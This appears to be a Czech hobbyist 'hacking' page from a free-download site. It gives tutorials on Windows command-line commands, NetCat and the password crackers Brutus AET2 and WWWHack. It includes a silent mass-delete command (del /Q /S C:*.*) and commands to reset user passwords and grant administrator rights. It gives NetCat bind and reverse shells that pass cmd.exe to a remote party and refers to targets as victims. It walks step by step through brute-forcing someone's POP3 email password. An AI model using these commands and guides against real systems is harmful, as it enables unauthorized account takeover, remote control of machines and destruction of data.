MP3 ke stažení zdarma Filmy ke stažení zdarma, hry ke stažení zdarma, mp3 ke stažení zdarma, on-line hry, seriály ke stažení zdarma, dokumenty ke stažení zdarma, Soudtracky ke stažení zdarma, Videoklipy, Videa ke stažení

Hacking

Návody na programy

 Návod na Příkazový řádek

Příkazový řádek je součástí Windows a spustíme ho v nabídce Start/Všechny programy/Příslušenství/Příkazový řádek a nebo jednoduše - Start/Spustit , do spustit napšte cmd,příkazový řádek se vám spustí.Nyní vám napíšu příkazy,které jsou velice užitečné:

AT - slouží k plánování úloh
        at 18:45 shutdown -s -f -t 00
        tento příklad vypne počítač v 18:45, ale pozor jen jednou!
CD - zobrazí název aktuální složky nebo změní aktuální složku
         relativně: cd složka
         absolutně: cd c:složka
CMD - Spustí vám nový příkazový řádek
COPY - Zkopíruje jeden nebo více souborů do jiného umístění
              copy zdroj + zdroj + zdroj cíl
              zdroj znamená soubor nebo soubory určené ke kopírování
              cíl je název složky, kam se mají soubory uložit nebo výsledného souboru
DEL - odstraní jeden nebo více souborů
           del /Q /S C:*.*
           odstraní všechny soubory z disku C:, které se zrovna nepoužívají a tudíž nejsou potřebné k chodu systému
           /Q způsobí, že nebude vyžádáno potvrzení smazání
           /S odstraní soubory i z podadresářů (složky nechá prázdné, ale stále tam budou)
DIR - Zobrazí výpis aktuálního adresáře nebo zvoleného adresáře:
          dir složka nebo dir C:složka
ECHO - Vypíše vámi zadaný text, dá se využít v kombinaci s proměnnými
               echo %username%
               Vypíše aktuálního uživatele
               Takto můžeme zapisovat i text do souborů:
               echo Do prdele necum > soubor.txt
               kdybysme ovšem takto opět zapsali do souboru, přepsali bysme předchozí text, protože místo > použijeme >> pro zápis na dalží řádek:
               echo Tohle bude další řádek textu >> soubor.txt
FOR - Slouží k zřetězení příkazu (provedení v určitém počtu)
            Základní použití je toto:
            for /L %i in (1,1,10) do příkaz
            první číslice znamená od kolika počítat
            druhá o kolik přičítat
            třetí do kolika počítat
            %i je proměnná, ve které se tento stav udržuje
            for /L %i in (1,1,10) do echo Počet do deseti: %i
FTP - pro přenos souborů
          ftp 63.12.63.39 nebo ftp ftp.webzdarma.cz
MD - Vytvoří složku
          md složka
          md c:složka
NET - Skvělý příkaz, má několik funkcí
net view zobrazí počítače v síti
net users zobrazí uživatele na počítači
net users %username% zobrazí informace o aktuálním uživateli
net users %username% nové_heslo změní heslo aktuálnímu uživateli bez znalosti původního hesla
net users nový_uživatel heslo /add vytvoří nového uživatele
net users kompik super změní heslo uživateli kompik na super
net localgroup zobrazí stávající skupiny
net localgorup Administrators ukáže uživatele ve skupině administrátorů
net localgroup Administrators %username% /add vloží stávajícího uživatele do skupiny Administrátorů
PING - Slouží k zjištění, jestli je daný počítač připojen k internetu, dá se pomocí něco i zjistit ip
             ping www.centrum.cz
             dostanete ip serveru centrum
TELNET - Aplikace slouží ke připojení k danému ip a portu
                   telnet IP_ADRESA PORT
                   Pokud port neuvedeme, je výchozí nastavení na 23
                   místo IP můžeme použít i dns (např. www.centrum.cz)
TRACERT - Slouží k trasování počítače
                       tracert 21.20.60.90
Ukáže vám přes jaké počítače vede komunikaci mezi vaším počítačem a počítačem oběti. DNS domény počítačů často obsahují části názvu měst, například pra, ust, apod..
TREE - Graficky zobrazí adresáře, podadresáře i soubory
              tree /F C: nebo Tree /F složka nebo tree /F
              Abyste místo diakritických znaků použili ASCII, tak použijte navíc přepínač /A
              tree /A /F atd...
VER - Zobrazí verzi operačního systému
SHUTDOWN - Vypne počítač
                           shutdown -s -f -t 00
                           provede okamžité vypnutí stávajícího počítače bez dotázání na ukončení aplikací
                           shutdown -s -f -t 10 -c "tak se měj"
                           provede to samé jako v předchozím případě ale s 10vteřinovým oknem zobrazujícím důvod(tak se měj)
EXIT - Vypne příkazový řádek

 

Návod na NetCat

 Tento program se velice často nazývá "Armádní Švýcarský nůž" každého hackera,ke stažení na mojim webu v sekci programy.K čemu slouží?

-slouží k zobrazení výpisu 
-vv to samé jako předchozí, ale poskytuje obsáhlejší výpis
-nv používá se místo -v když se připojujeme místo dns na ip
-z zapne skenování portů
-w2 zvýší rychlost skenování portů
-d Zapne v tichém režimu
-l slouží k otevření portu na našem počítači
-L To samé, akorát že předchozí parametr vydrží pouze jedno připojení
-e jakmile se někdo připojí, tak skrz připojení protáhne výpis souboru (např. cmd.exe protáhne příkazový řádek oběti až k vám)

Několik příkladů:

nc -v www.webzdarma.cz 80
připojí se na server Webzdarma na port 80
poté můžete zadat příkaz
HEAD / HTTP/1.0
[ENTER]
[ENTER]
čímž se vám zobrazí hlavička serveru zobrazující nějaké informace (zvláště typ serveru)

nc -vv -z -w2 www.seznam.cz 23-300
Provede skenování portů TCP od 300 do 23 (pozpátku)

nc -v -l -p 8080
Vytvoří naslouchajícího démona na portu 8080 čekajícího na spojení

nc -v -l -p 8080 -e cmd.exe
Vytvoří naslouchajícího démona s tím rozdílem, že když se k němu někdo připojí, bude mu předána vaše příkazová řádka

nc -nv 61.63.399.63 8080 -e cmd.exe
Předá příkazový řádek netcatu naslouchajícím na portu 8080 (pokud nebyl použit parametr -e cmd.exe u naslouchajícího nc)

nc -d -L -p 8080 -e cmd.exe
Spustí netcat v tichém režimu, pokud se na něj někdo připojí, bude mu předán příkazový řádek, možnost spojení přes telnet:
telnet ip_obětí 8080

 

Návod  Brutus AET2 - česká verze


Zjištění hesla e-mailu POP3:

1.Cíl - napsat pop3.seznam.cz - příklad: když je mail na centrumu tak napsat: pop3.centrum.cz 

2.Typ - zadat pop3

3.Zaškrtnout - Užívací uživatel + jediný uživatel

4.Uživatelé - napsat login,jméno.Když je mail pepa@centrum.cz,tak napsat pouze pepa

5.Povolení - Word list

6.Pass File - zadat příslušný wordlist,který máte na disku.Ve wordlitu musí být uvedeno potencionální heslo,jinak ho program nenajde.Chce to mít  zkrátka ten zprávný wordlist!Fakt je ten,že je to zdlouhavé... .Je také možno zadat Combo list,zadejte combo wordlist,který máte uložený na disku.Dále je možno vyhledávat pomocí Brute force,takto není potřeba žádný wordlist,program kombinuje písmena.Brute force může trvat i 100 let a heslo nenajdete!!!

7.Potom stačí kliknout - Start a program vyhledává

Nalezené heslo se zobrazí - Pozitivní výsledky ověření.Navíc jste upozorněn zvukem.

Vyhledávání HTTP,telnet ... je velice obdobné.

 

Návod  WWWHack

WWWHack je legendární program na vyhledávání hesel,nicméně já upřednostňuju Brutus AET2. Pozor, pokud vám nepůjde spustit, musíte si změnit datum třeba o 6 měsíců zpět, on se pak spustí a natáhne z netu upgrade.

1. klikněte na položku Access a zvolte POP3 email acct. Do pole Host vepište pop3.server.cz  ,např. pop3.centrum.cz

2. Username máte několik možností. První možnost je vybrat Read from this file. Pak vyberete soubor a on bude zkoušet usernames z toho souboru,  (pepa@centrum.cz pak jen zadáte pepa).

3. All possible combinations. Zadáte od kolika znaků má začít a do kolika znaků se má pokoušet hacknout heslo.Vedle máte tlačítko TimeCalc a tam při zadání všech údajů zjistíte, jak dlouho by to asi mělo trvat do konce vyhledávání.

4. Always use this username. Tam zadáte username a program se bude pokoušet hledat heslo e-mailu pouze s tímto loginem.

5. Password. Má stejné možnosti Read from this file a All possible combinations.

6. Assume it’s the same as the username. To znamená že zkusí vždy stejné heslo jako login (login=pass).

7. Stop after finding one password - zastavení programu po nalezení hesla.

8. Skip to next username after finding one password - přeskočit na další po nalezení jednoho hesla

Poslední komentáře
14.01.2007 19:26:46: A další hide text...